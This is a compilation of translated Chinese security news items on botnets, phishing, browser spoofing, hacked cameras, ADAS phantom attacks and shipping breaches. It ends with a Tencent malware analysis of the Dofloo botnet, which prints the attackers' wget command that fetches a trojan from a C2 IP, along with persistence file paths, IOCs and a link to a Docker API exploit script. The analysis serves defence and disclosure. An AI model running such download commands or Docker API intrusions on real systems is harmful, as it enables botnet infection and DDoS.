据荷兰媒体报道， 四名荷兰人是目前在德国受审的八人之一，他们在为全世界犯罪分子用来进行数百万欧元的非法交易的暗网计算机中心提供主机服务方面发挥了作用。这八人被指控通过存放在摩泽尔河附近一个废弃的地堡中的服务器，促成了超过249000起犯罪。被作为一个更容易访问数据的快速切入点。 该地堡是荷兰国民Herman Johan Xennt在2013年购买的，据报道，他在托管活动中遇到麻烦后离开了荷兰，他的服务器也存放在泽兰的一个地堡中。总共有4名荷兰人、3名德国人和1名保加利亚人嫌疑人–年龄从20岁到60岁不等–被指控与“网络碉堡”(cyberbunker)活动有关。 Telegraaf周二表示，通过服务器处理的交易包括毒品–Cannabis Road等平台–拥有数百万活跃用户。该报称，其他网站允许人们订购假钱和身份证，该地堡还被用来对德国电信公司德国电信进行僵尸攻击。对该“网络碉堡”的调查历经多年的观察和电话窃听，最终在2019年9月的一次有650名警察参与的突袭行动中取得突破。该案的受审计划进行到2021年。     （消息来源：cnbeta；封面来自网络）

在诺基亚最新发布的《Threat Intelligence Report》中，表示由于在安全方面存在的诸多隐患，导致与互联网连接设备日益受到攻击威胁。该报告称，目前物联网设备感染率达到了 33%，高于 2019 年的 16%。 根据该报告，受影响最大的物联网设备是那些常规分配给公众的互联网IP地址的设备。它强调指出，由于网络扫描看不到易受攻击的设备，因此使用运营商级网络地址转换的网络看到 IoT 设备的感染率大大降低。 诺基亚软件总裁兼首席数字官Bhaskar Gorti在评论报告中的发现时说：“ 5G 生态系统中正在发生的巨大变化，随着到 2021 年在全球范围内部署更多5G网络，为恶意行为者利用物联网设备中的漏洞提供了充足的机会。该报告不仅增强了消费者和企业加强自身网络保护实践的迫切需求，而且还对物联网设备生产商提供了更高需求。”     （消息来源：cnBeta； 封面来自网络）

虽然在桌面浏览器上有各种迹象和安全功能，可以用来检测恶意代码改变地址栏以显示假网址，但这在移动浏览器上是不可能的，因为移动浏览器的屏幕尺寸很重要，而且桌面浏览器中的许多安全功能都不存在。由于地址栏是移动浏览器上唯一也是最后一道防线，地址栏欺骗漏洞在智能手机和其他移动设备上的危险性要高出许多倍。 在网络安全公司Rapid7今天发布的一份报告中，该公司表示，它与巴基斯坦安全研究人员Rafay Baloch合作，披露了七个移动浏览器应用中的十个新的地址栏欺骗漏洞。受影响的浏览器包括苹果Safari、Opera Touch和Opera Mini等大牌浏览器，也包括Bolt、RITS、UC浏览器和Yandex浏览器等小众应用。 这些问题在今年早些时候被发现，并在8月份向浏览器制造商报告。大厂商马上对这些问题进行了修补，而小厂商甚至懒得回复研究人员，使他们的浏览器容易受到攻击。Rapid7的研究总监Tod Beardsley说：”利用都归结为’JavaScript诡计'”。Rapid7的负责人表示，通过扰乱页面加载和浏览器有机会刷新地址栏URL之间的时间，恶意网站可以迫使浏览器显示错误的地址。 Beardsley认为，攻击很容易发动，建议用户尽快更新浏览器，或者转移到不受这些bug影响的浏览器上。     （消息来源：cnbeta；封面来自网络）

一个黑客团体声称已攻击50,000多个家用摄像设备，部分录像已在成人网站上发布，并声称支付150美元就可享受终身观看服务。 The New Paper报道：“已有70多名成员支付订阅费。部分被上传的录像显示来自新加坡。该小组可在社交平台Discord上找到，目前它拥有近千名成员。” 经判断：大部分录像都来自新加坡，其他则来自泰国、韩国和加拿大。黑客提供了一个700兆的包含4,000多个录像和图片的数据包，还为客户提供被攻击摄像设备的访问权限。然而在大多数情况下，部署物联网设备（包括IP摄像设备）时都没有采取适当的安全措施。在发布这篇文章时，我们仍不清楚黑客如何破坏IP摄像设备，他可能利用了设备的漏洞或者猜测其保护密码。 2017年，Persirai  IoT僵尸网络劫持了数千台型号的IP摄像设备；2017年6月，F-Secure的安全专家发现了中国制造商Foscam的互联网摄像设备中的数十个漏洞。在过往的案例中，黑客都是利用漏洞攻击联网的摄像设备，通过内置FTP服务器查看视频源并上载和下载文件。 ESET安全专家Jake Moore表示：“这些事件警示我们，在使用联网摄像设备时，必须采取一定的安全保护措施。设置好安全保护设备后，便无需担心隐私泄露问题。” 专家建议：为了避免隐私泄露问题，请确保所有IoT设备都更新至最新版本并应用所有安全补丁；设置安全系数高的密码，使用多重身份验证以保障帐户安全；购买联网摄像设备时，选择信誉较好的、具有相关安全保护设备的供应商。         消息来源：securityaffairs，封面来自网络；译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。  

KnowBe4安全研究人员发现，以选举为主题的信息不断增加，涉及美国总统健康到 民主党全国委员会，再到冒充美国选举援助委员会 （EAC）。这些信息冒充选民注册页面，试图收集个人资料（PII）。我们将在文中详细介绍研究人员识别出的相关凭证和网络钓鱼工具包。 … 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1372/       消息来源：proofpoint ，封面来源于网络，译者：小江； 本文由 HackerNews.cc 翻译整理； 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

前言 自复学以来，被称为“Silent Librarian/ TA407 / COBALT DICKENS”的APT组织就一直通过网络钓鱼活动瞄准大学。 9月中旬，一位客户告知我们该APT组织开展的一项新的网络钓鱼活动。基于目标受害者数量庞大，我们得知，APT组织不局限于特定国家，而是试图扩大其覆盖范围。 …… 更多内容请至Seebug Paper 阅读全文：https://paper.seebug.org/1370/     消息来源：malwarebytes  ，图片来源网络，译者：小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。    

随着技术的进步，车载驾驶辅助系统的安全性得到了不断的提升，但其可靠性仍未能让我们感到满意。安全研究人员已经证明，通过被劫持的互联网广告牌，就可诱导特斯拉电动汽车的 Autopilot 等系统采取突然的制动、驻车或转弯等操作。《连线》杂志报道称，位于以色列内盖夫的本·古里安大学的研究人员，一直在对所谓的“鬼影”图像展开试验。 资料图（来自：Tesla） 具体说来是，这些图像可能让自动驾驶 / 驾驶辅助系统感到困惑，其中涉及到营造瞬间的光线投射、让系统“看到”不存在的物体（比如停车指示牌）。 这项技术的早期示例，是将路标和人的影像投射到道路上。即便只显示几毫秒的时间，就足以误导高级驾驶辅助系统（ADAS）。 虽然本文介绍的这项新研究基于类似的方法，但演示中并未使用投影的图像，而是利用了联网的数字广告牌。 在侵入某款数字广告板之后，攻击者可注入一些可能导致汽车发生碰撞的内容，但不会留下明显的痕迹（司机只会感到一头雾水）。 据悉，研究人员针对特斯拉 Autopilot 和 MobileEye 630 系统开展过测试，前者会被出现仅 0.42 秒的鬼影图像所欺骗、后者则是 1/8 秒。 有关这项研究的详情，将在今年 11 月的 ACM 计算机和通信安全会议上作介绍。让人担忧的是，这类数字广告牌鬼影攻击可能波及更多车型和导致大范围的误伤。   （稿源：cnBeta，封面源自网络。）  

COVID-19不仅会对健康、社会和经济造成危害，而且会引发网络安全危机。这一流行病给企业在远程协作和业务连续性领域带来了新的挑战。 随着远程工作越来越多，员工们使用了大量的互联网工具。由于企业和人们开始越来越依赖技术，并忙于与流行病作斗争，攻击者现在比以往任何时候都有更多的选择来攻击他们。 根据PWC的4月报告，印度公司面临的安全威胁在2020年3月翻了一番，更令人担忧的是，从2020年1月17日到20日，安全威胁的数量增加了100%。 印度联邦电子与信息技术国务部长Sanjay Dhotre表示，印度第二季度发生的网络攻击超过35万次，是2020年第一季度记录事件数量的三倍。他还强调，截止到2020年8月，一共发生70万起网络安全事件。 数字网络安全危机 ACRONIS Cyber Readiness 2020年报告显示，全球31%的公司每天至少面临一次网络安全事件。然而，印度每天报告的网络攻击次数是以前的两倍，其中大多数网络攻击包括网络钓鱼、DDoS、视频会议、利用弱服务和恶意软件。 网络钓鱼活动是最令人担忧的攻击，因为它们在这场流行病期间达到了顶峰。尽管恶意软件的数量较少，但在印度，它仍然是一个更为严重的问题——报告的恶意软件问题几乎是全球平均水平的2倍。 此外，在接受调查的组织中，有39％经历了视频会议攻击。其中，印度、加拿大、瑞士和英国是受影响最大的国家。 以冠状病毒为主题的网络钓鱼电子邮件和声称有关COVID-19的有用信息的恶意网站已成为了最大威胁。此外，根据Seqrite的报告，从2020年4月至6月，共发现40万起新的勒索软件攻击。 这些网络攻击大多是通过利用易受攻击的服务获得对远程系统的访问进行的。 为什么印度容易遭受网络攻击？ NITI Aayog报告指出，原因是越来越多地使用互联网和移动技术。印度在全球互联网用户数量排名第三，仅次于美国和中国。随着互联网和手机用户的指数级增长，印度和全球的网络攻击事件数量显著上升。 内部安全威胁被忽略。企业更注重通过无缝操作保证业务连续性，而不是弥合远程基础架构中的缺口。如果敏感数据在不同部门之间流动，而没有适当的监视和记录过程，那么在发生任何攻击时识别漏洞就变得很困难。 外部威胁增加。随着不断增加的外部威胁，只有少数印度公司采取了网络应用防火墙等安全措施来监控外部威胁，并在网络攻击事件发生时及时阻止。 远程工作期间暴露出弱点。远程工作期间暴露的主要弱点包括身份验证技术薄弱、监控不足和暴露的服务器（DNS、VPN、RDP等）。 此外，许多员工通常忽视个人网络安全。在这种“work from anywhere culture”的文化下，员工开始在自己的官方机器上访问自己的个人电子邮件和社交媒体网站。总的来说，随着个人和工作生活的在线融合，网络攻击很容易通过不安全的个人帐户发生。 缺少云技术方面的专业知识也是问题所在。为了确保从任何设备和任何地方访问数据的方便性，许多公司都采用了云技术。然而，他们没有足够的内部资源来管理和保护APIs， SaaS或containers。越来越多的低配置云架构将不可避免地为攻击者打开大门。 保护措施 以下是一些安全提示： 1.对员工进行安全原则培训。 2.对于通过电子邮件收到的附件、链接或文本，尤其是与COVID-19相关的主题行，要谨慎 构建的远程工作策略。 3.仅使用可信来源，如从合法网站获取最新信息。 4.不要在陌生人的电子邮件或电话中透露你的财务或个人信息。 5.鼓励只为公务目的使用办公设备。 6.不要在不同的帐户和应用程序之间重复使用密码。 7.进行数据备份并单独存储。 8.使用多因素身份验证。 9.使用基于云的WAF（如AppTrana）使堆栈现代化，AppTrana是下一代网络安全保护套件，包括漏洞评估、虚拟补丁、零误报、DDoS攻击防范和其他功能。 在网络安全领域，下一代威胁监测工具和预测分析超越了基于规则的系统，可以检测网络风险，从而以安全、快速的方式标记潜在威胁。有了足够的全国性的网络安全意识和强有力的政策，企业才能够在未来有效地应对网络威胁。     稿件与封面来源：The Hacker News，译者：芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理， 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

据报道，全球航运业在一周内遭受了第二次网络攻击，这引发了人们对供应链中断的担忧。目前，这些供应链已经十分紧张，可能无法在消费者需求的传统旺季及时运送商品。国际海事组织（International Maritime Organization）周四发表声明说，该组织的IT系统遭受了一次复杂的网络攻击。 国际海事组织是联合国旗下的一个海事行业监管机构，组织表示，目前一些网络服务无法使用，网络入侵正在影响他们的公共网站和内部系统。 本周早些时候，全球运力第四大集装箱班轮公司达飞海运（CMA CGM SA）披露，其信息系统受到了攻击。达飞海运星期四表示，公司各办事处“正在逐步重新连接到网络，以提高了预订和文件处理的时间。” 达飞海运在一份电子邮件声明中表示：“我们怀疑这是一次数据泄露，我们正在尽一切可能评估其潜在规模和性质。”据Alphaliner的数据，达飞海运是全球五大集装箱班轮之一，其运力占全球的65%。 近年来，一系列网络事件困扰着航运业，其中最大的一起是2017年的网络入侵，导致总部位于哥本哈根的马士基公司损失了约3亿美元。 网络安全公司Pen Test Partners的安全专家肯·芒罗（Ken Munro）表示：“马士基事件显然引起了骗子和网络罪犯的注意，他们意识到航运业受到了严重冲击。如果岸上的系统无法预订集装箱，船只就无法装载货物，也就无法产生收入。因此，针对航运公司的网络攻击对勒索软件运营商来说是有利可图的。” 虽然暂时并不能肯定，最近的网络攻击会对全球贸易造成短暂的刺激，还是会引发更大范围的破坏。但物流专家李·克拉斯科夫（Lee Klaskow）表示：“网络威胁短期内肯定会带来不利影响，让人头疼。” 对于那些仍在等待季节性周期恢复正常的航运公司来说，最近网络攻击行动发生的时机尤其糟糕。 由于消费者被迫在家工作、在网上购买必需品，从纸巾、口罩到蹦床和电脑显示器等各种物品的供应链都很紧张。此外，由于电子商务采购依然强劲，企业也在补充库存，货主对供应链的需求并未减少，但运力却在下降。因此，自今年年初以来，跨越太平洋运输集装箱的基准成本增加了两倍。     （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文链接：https://mp.weixin.qq.com/s/ceNfVRneGGIkbFOqItU11g  一、概述 腾讯安全威胁情报中心检测到Dofloo（AESDDoS）僵尸网络正批量扫描和攻击Docker容器。部分云主机上部署的Docker容器没有针对远程访问做安全认证，存在Remote API允许未授权使用漏洞且暴露在公网，导致黑客通过漏洞入侵并植入Dofloo僵尸网络木马。 云计算兴起后，服务器硬件扩展非常便利，软件服务部署成为了瓶颈，Docker作为开源的引擎可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器，因而逐渐得到广泛应用。 而开发者在部署Docker时未对相关服务进行正确合理的配置导致其容易成为黑客入侵的路径之一，之前已有H2Miner利用Docker漏洞进行入侵挖矿的案例被披露（https://mp.weixin.qq.com/s/iNq8SdTZ9IrttAoQYLJw5A）。此次Dofloo僵尸网络入侵系统后，会搜集系统敏感信息并加密上传，接收C&C服务器指令，执行各类DDoS攻击。 腾讯安全系列产品已支持检测Dofloo（AESDDoS）僵尸网络的最新变种，企业安全运维人员如果发现已经中招，可对照分析报告的详细内容，将攻击者下载安装的文件和启动项删除，再参考以下安全响应清单进行排查，修复Remote API允许未授权使用的漏洞，避免再次遭遇入侵。 具体响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）Dofloo僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Dofloo僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）Dofloo僵尸网络关联的IOCs已支持识别检测； 2）检测Docker未授权访问漏洞利用攻击。   有关云防火墙的更多信息，可参考： https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀Dofloo僵尸网络相关木马程序； 2）已支持Docker Daemon 2375管理端口开启的风险项检测。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持通过协议检测Dofloo僵尸网络与服务器的网络通信； 2）检测Docker未授权访问漏洞利用攻击； 3）检测DDoS攻击流量；   关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 二、样本分析 在此次攻击中，攻击者首先通过向端口2375(与Docker守护进程通信的默认端口)发送TCP SYN数据包对给定的IP范围进行批量扫描。确定开放端口的目标IP后，发送请求调用/containers/json接口获取正在运行中的容器列表，之后使用Docker EXEC命令执行以下shell访问公开主机中所有正在运行的容器并下载木马Linux2.7。 获取容器列表： 针对运行状态的容器利用Docker EXEC执行木马下载命令： wget -P /tmp/ http[:]//49.235.238.111:88/Linux2.7 被下载的Dofloo僵尸网络木马Linux2.7会连接到49.235.238.111:48080来发送和接收来自攻击者的远程shell命令。 Dofloo僵尸网络还会在从被感染系统窃取信息，包括操作系统版本，CPU型号、速度和类型。 通过将自身路径写入/etc/rc.local、/etc/rc.d/rc.local、/etc/init.d/boot.local文件中以添加为自启动项。 使用AES算法对窃取的系统信息和命令和控制（C＆C）数据进行加密。 此Dofloo变种能够发起各种类型的DDoS攻击，包括DNS、SYN，LSYN，UDP，UDPS，TCP和CC Flood。 IOCs C&C 49.235.238.111:48080 175.24.123.205: 48080 IP 49.235.238.111 89.40.73.126 175.24.123.205 URL http[:]//49.235.238.111[:]88/Linux2.7 http[:]//49.235.238.111/Lov.sh http[:]//49.235.238.111/lix http[:]//49.235.238.111/Verto http[:]//49.235.238.111[:]88/NgYx http[:]//49.235.238.111/linux-arm http[:]//49.235.238.111/shre.sh http[:]//89.40.73.126[:]8080/Linux2.7 http[:]//89.40.73.126/linux2.6 http[:]//89.40.73.126[:]8080/linux-arm http[:]//89.40.73.126[:]8080/Linux2.6 http[:]//89.40.73.126[:]8080/YmY http[:]//89.40.73.126[:]8080/LTF http[:]//89.40.73.126[:]8080/NgYx http[:]//89.40.73.126[:]8080/Mar http[:]//89.40.73.126[:]8080/linux2.6 http[:]//89.40.73.126[:]8080/Flood http[:]//175.24.123.205:88/Fck MD5 Flood 0579a022802759f98bfdf08e7dd16768 Linux2.7 0b0f1684f6791d9f8c44a036aa85a2cc lix 9530e46caab834e1e66a108e15ea97ca linux-arm ca1f347447ddf7990ccd0d6744f3545d Linux 05f28784a0da0c1e406d98c02dc7d560 arm 34eeb9eaa65c4a062311a886dd0157f1 Fck df86da9e341c3a9822f30ac4eba11951 Lov.sh 83caa873cee081162c417eb8dec4a351 Rze.sh 48c910cd9a07404fbfb8bf52847e72c3 SHre.sh bb7cdf5707a857036cd41af4bafaed31 参考链接： https://www.trendmicro.com/en_us/research/19/f/aesddos-botnet-malware-infiltrates-containers-via-exposed-docker-apis.html https://github.com/SPuerBRead/Docker-Remote-API-Exploit/blob/master/dockerAPI_Exploit.py